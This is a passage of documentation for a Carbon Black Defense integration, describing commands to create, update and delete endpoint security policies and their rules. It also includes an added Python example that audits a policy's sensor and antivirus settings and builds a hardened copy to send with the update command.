"true" }, { "name": "BACKGROUND_SCAN", "value": "true" }, { "name": "POLICY_ACTION_OVERRIDE", "value": "true" }, { "name": "QUARANTINE_DEVICE_MESSAGE", "value": "Your device has been quarantined by your computer administrator." }, { "name": "LOGGING_LEVEL", "value": "false" }, { "name": "ALLOW_UNINSTALL", "value": "true" }, { "name": "QUARANTINE_DEVICE", "value": "false" }, { "name": "RATE_LIMIT", "value": "0" }, { "name": "CONNECTION_LIMIT", "value": "0" }, { "name": "QUEUE_SIZE", "value": "100" }, { "name": "LEARNING_MODE", "value": "0" }, { "name": "SCAN_NETWORK_DRIVE", "value": "true" }, { "name": "BYPASS_AFTER_LOGIN_MINS", "value": "0" }, { "name": "BYPASS_AFTER_RESTART_MINS", "value": "0" }, { "name": "SCAN_EXECUTE_ON_NETWORK_DRIVE", "value": "true" }, { "name": "DELAY_EXECUTE", "value": "true" }, { "name": "PRESERVE_SYSTEM_MEMORY_SCAN", "value": "false" }, { "name": "HASH_MD5", "value": "false" }, { "name": "SCAN_LARGE_FILE_READ", "value": "false" }, { "name": "SHOW_FULL_UI", "value": "true" }, { "name": "HELP_MESSAGE", "value": "CarbonBlack" }, { "name": "SECURITY_CENTER_OPT", "value": "true" }, { "name": "CB_LIVE_RESPONSE", "value": "true" }, { "name": "UNINSTALL_CODE", "value": "false" } ] }, "priorityLevel": "LOW", "version": 2 } }
Context Example
CarbonBlackDefense:{} 1 item
CreatePolicy:{} 1 item
PolicyId:21356
Human Readable Output
| PolicyId | 21356 |
|---|
Update a policy
Updates an existing policy.
Base Command
cbd-update-policy
Input
| Parameter | Description |
| description | Policy description |
| name | A single-line name for the policy |
| priorityLevel | Priority score associated with sensors assigned to this policy |
| id | The ID of the policy to update |
| policy | JSON object containing the policy details. Make sure a valid policy object is passed; the command example below shows the expected shape. |
Context Output
There is no context output for this command.
Command Example
!cbd-update-policy id=21355 priorityLevel=LOW description="woot" name="boot" policy={"knownBadHashAutoDeleteDelayMs":null,"directoryActionRules":[],"rules":[],"id":-1,"sensorSettings":[{"name":"ALLOW_UNINSTALL","value":"true"},{"name":"ALLOW_UPLOADS","value":"false"},{"name":"SHOW_UI","value":"false"},{"name":"ENABLE_THREAT_SHARING","value":"true"},{"name":"QUARANTINE_DEVICE","value":"false"},{"name":"LOGGING_LEVEL","value":"NORMAL"},{"name":"QUARANTINE_DEVICE_MESSAGE","value":"Your device has been quarantined. Please contact your administrator."},{"name":"SET_SENSOR_MODE","value":"0"},{"name":"SENSOR_RESET","value":"0"},{"name":"BACKGROUND_SCAN","value":"false"},{"name":"POLICY_ACTION_OVERRIDE","value":"true"},{"value":"","name":"HELP_MESSAGE"},{"value":"false","name":"PRESERVE_SYSTEM_MEMORY_SCAN"},{"value":"false","name":"HASH_MD5"},{"name":"SCAN_LARGE_FILE_READ","value":"false"},{"name":"SCAN_EXECUTE_ON_NETWORK_DRIVE","value":"false"},{"name":"DELAY_EXECUTE","value":"false"},{"name":"SCAN_NETWORK_DRIVE","value":"false"},{"name":"BYPASS_AFTER_LOGIN_MINS","value":"0"},{"name":"BYPASS_AFTER_RESTART_MINS","value":"0"},{"name":"SHOW_FULL_UI","value":"false"},{"name":"SECURITY_CENTER_OPT","value":"false"},{"name":"CB_LIVE_RESPONSE","value":"false"},{"name":"UNINSTALL_CODE","value":"false"}],"avSettings":{"signatureUpdate":{"schedule":{"initialRandomDelayHours":4,"fullIntervalHours":0,"intervalHours":4}},"features":[{"enabled":false,"name":"SIGNATURE_UPDATE"},{"enabled":false,"name":"ONACCESS_SCAN"},{"name":"ONDEMAND_SCAN","enabled":true}],"updateServers":{"servers":[{"flags":0,"regId":null,"server":["http://updates.cdc.carbonblack.io/update"]}],"serversForOffSiteDevices":["http://updates.cdc.carbonblack.io/update"]},"apc":{"maxExeDelay":45,"riskLevel":4,"enabled":false,"maxFileSize":4},"onAccessScan":{"profile":"NORMAL"},"onDemandScan":{"profile":"NORMAL","scanCdDvd":"AUTOSCAN","scanUsb":"AUTOSCAN","schedule":{"startHour":0,"recoveryScanIfMissed":true,"days":null,"rangeHours":0}}}}
Human Readable Output
Request Success
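Worked example, added here and not part of the integration or of the original page, serving both cbd-get-policy and cbd-update-policy: audit a policy object returned by cbd-get-policy for weak sensor settings, check that a policy JSON has the shape the create/update commands expect, and build the hardened copy to pass as the policy argument of cbd-update-policy. The input is the system policy 6525 from the cbd-get-policy example, re-typed as constructed data and trimmed to the fields used. Which settings count as weak, and the meaning assumed for each sensor setting name, are this example's choices; the object shape and every setting name and value come from the page's own examples.

```python
"""Audit a Carbon Black policy object and build the hardened copy to send with
cbd-update-policy (added example; not code from the integration).

SAMPLE_POLICY is the system policy 6525 from the cbd-get-policy example,
trimmed to the fields used. Which settings count as weak, and the meaning
assumed for each sensor setting, are this example's choices; the object shape
(avSettings / rules / sensorSettings / directoryActionRules) and every name
and value come from the page's examples.
"""
import copy
import json

# Constructed from the page's cbd-get-policy context example.
SAMPLE_POLICY = {
    "avSettings": {
        "apc": {"enabled": False, "maxExeDelay": 45, "maxFileSize": 4, "riskLevel": 4},
        "features": [{"enabled": False, "name": "SIGNATURE_UPDATE"},
                     {"enabled": False, "name": "ONACCESS_SCAN"},
                     {"enabled": True, "name": "ONDEMAND_SCAN"}],
        "onAccessScan": {"profile": "NORMAL"},
    },
    "directoryActionRules": [],
    "id": -1,
    "rules": [],
    "sensorSettings": [{"name": "ALLOW_UNINSTALL", "value": "true"},
                       {"name": "ALLOW_UPLOADS", "value": "false"},
                       {"name": "BYPASS_AFTER_LOGIN_MINS", "value": "0"},
                       {"name": "BYPASS_AFTER_RESTART_MINS", "value": "0"},
                       {"name": "CB_LIVE_RESPONSE", "value": "false"},
                       {"name": "UNINSTALL_CODE", "value": "false"}],
}

# Target values (assumed meanings: ALLOW_UNINSTALL lets the end user remove the
# sensor, UNINSTALL_CODE demands a code to do so, CB_LIVE_RESPONSE lets responders
# open a Live Response session, BYPASS_* are minutes without enforcement).
HARDENED_SENSOR_SETTINGS = {"ALLOW_UNINSTALL": "false", "UNINSTALL_CODE": "true",
                            "CB_LIVE_RESPONSE": "true", "BYPASS_AFTER_LOGIN_MINS": "0",
                            "BYPASS_AFTER_RESTART_MINS": "0"}
AV_FEATURES_REQUIRED = ("ONACCESS_SCAN", "SIGNATURE_UPDATE")
# Baseline blocking rule, in the rule shape of the cbd-create-policy example.
BASELINE_RULE = {"action": "DENY", "operation": "RUN", "required": True,
                 "application": {"type": "REPUTATION", "value": "KNOWN_MALWARE"}}
RULE_KEYS = {"action", "operation", "required", "id", "application"}
NO_BASELINE = "no DENY rule for KNOWN_MALWARE on RUN"


def sensor_setting(policy, name):
    return next((s["value"] for s in policy["sensorSettings"] if s["name"] == name), None)


def validate_shape(policy):
    """Problems that would make cbd-create-policy / cbd-update-policy reject the
    object, judged against the shape seen on this page. Empty list = looks valid."""
    problems = [f"missing top-level key {k}" for k in
                ("avSettings", "rules", "sensorSettings", "directoryActionRules") if k not in policy]
    for i, rule in enumerate(policy.get("rules", [])):
        missing = RULE_KEYS - set(rule)
        if missing:
            problems.append(f"rule #{i} missing {sorted(missing)}")
        elif set(rule["application"]) != {"type", "value"}:
            problems.append(f"rule #{i}: application needs exactly type and value")
    return problems


def audit(policy):
    """Weak settings found; an empty list means the policy passes this baseline."""
    findings = [f"{n}={sensor_setting(policy, n)!r}, expected {v!r}"
                for n, v in HARDENED_SENSOR_SETTINGS.items() if sensor_setting(policy, n) != v]
    findings += [f"AV feature {f['name']} disabled" for f in policy["avSettings"].get("features", [])
                 if f["name"] in AV_FEATURES_REQUIRED and not f["enabled"]]
    if not any(r["action"] == "DENY" and r["operation"] == "RUN"
               and r["application"] == BASELINE_RULE["application"] for r in policy["rules"]):
        findings.append(NO_BASELINE)
    return findings


def harden(policy):
    """Deep copy with every audit finding fixed; the input object is left untouched."""
    fixed = copy.deepcopy(policy)
    for name, wanted in HARDENED_SENSOR_SETTINGS.items():
        entries = [s for s in fixed["sensorSettings"] if s["name"] == name]
        if entries:
            entries[0]["value"] = wanted
        else:
            fixed["sensorSettings"].append({"name": name, "value": wanted})
    for feat in fixed["avSettings"].get("features", []):
        if feat["name"] in AV_FEATURES_REQUIRED:
            feat["enabled"] = True
    if NO_BASELINE in audit(policy):
        next_id = max((r["id"] for r in fixed["rules"]), default=0) + 1
        fixed["rules"].append({**BASELINE_RULE, "id": next_id})
    return fixed


def update_command(policy_id, policy, name, description, priority="MEDIUM"):
    """Render the war-room command with the policy JSON on one line, as on the page."""
    return (f"!cbd-update-policy id={policy_id} priorityLevel={priority} "
            f"name={json.dumps(name)} description={json.dumps(description)} "
            f"policy={json.dumps(policy, separators=(',', ':'))}")


if __name__ == "__main__":
    print("shape problems:", validate_shape(SAMPLE_POLICY) or "none")
    for finding in audit(SAMPLE_POLICY):
        print("WEAK:", finding)
    print(update_command(6525, harden(SAMPLE_POLICY), "hardened", "audited baseline"))
```

Run validate_shape before any cbd-create-policy or cbd-update-policy call: the command replaces the whole policy object, so a missing key or a malformed rule is not a partial update but a broken policy. Sensor setting values stay strings ("true", "0") because that is how the page's examples carry them; only the rule's required field is a JSON boolean. Policy 6525 is a system policy, so in practice the hardened copy would be applied to a custom policy rather than the built-in one.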
Delete a policy
Deletes a specified policy.
Base Command
cbd-delete-policy
Input
| Parameter | Description |
| policyId | Policy ID |
Context Output
There is no context output for this command.
Human Readable Output
Request Success
Add a rule to a policy
Adds a specified rule to a specified policy.
Base Command
cbd-add-rule-to-policy
Input
| Parameter | Description |
| action | Rule action |
| operation | Rule operation |
| required | Whether the rule is required (true or false) |
| id | Rule ID |
| type | Application type |
| value | Application value |
| policyId | Policy ID |
Context Output
There is no context output for this command.
Command Example
!cbd-add-rule-to-policy action="TERMINATE" id="7777" operation="RANSOM" required="false" type="REPUTATION" policyId="21355" value="COMPANY_BLACK_LIST"
Human Readable Output
Request Success
Delete a rule from a policy
Deletes a specified rule from a specified policy.
Base Command
cbd-delete-rule-from-policy
Input
| Parameter | Description |
| policyId | ID of the policy to delete the rule from |
| ruleId | ID of the rule to delete |
Context Output
There is no context output for this command.
Command Example
!cbd-delete-rule-from-policy ruleId=2 policyId=21355
Human Readable Output
Request Success
Update a rule in a policy
Updates a rule in a specified policy.
Base Command
cbd-update-rule-in-policy
Input
| Parameter | Description |
| action | Rule action |
| operation | Rule operation |
| required | Whether the rule is required (true or false) |
| id | Rule ID |
| type | Application type |
| value | Application value |
| policyId | Policy ID |
Context Output
There is no context output for this command.
Command Example
!cbd-update-rule-in-policy action="TERMINATE" id=1 operation=RANSOM policyId=21355 required=false type=REPUTATION value=COMPANY_BLACK_LIST
Human Readable Output
Request Success
Set a policy
Sets a specified policy.
Base Command
cbd-set-policy
Input
| Parameter | Description |
| keyValue | A JSON object of key-value pairs. Each key is the field path in the policy object to update, and each value is the new value for that field. |
| policy | The policy to set. |
Context Output
There is no context output for this command.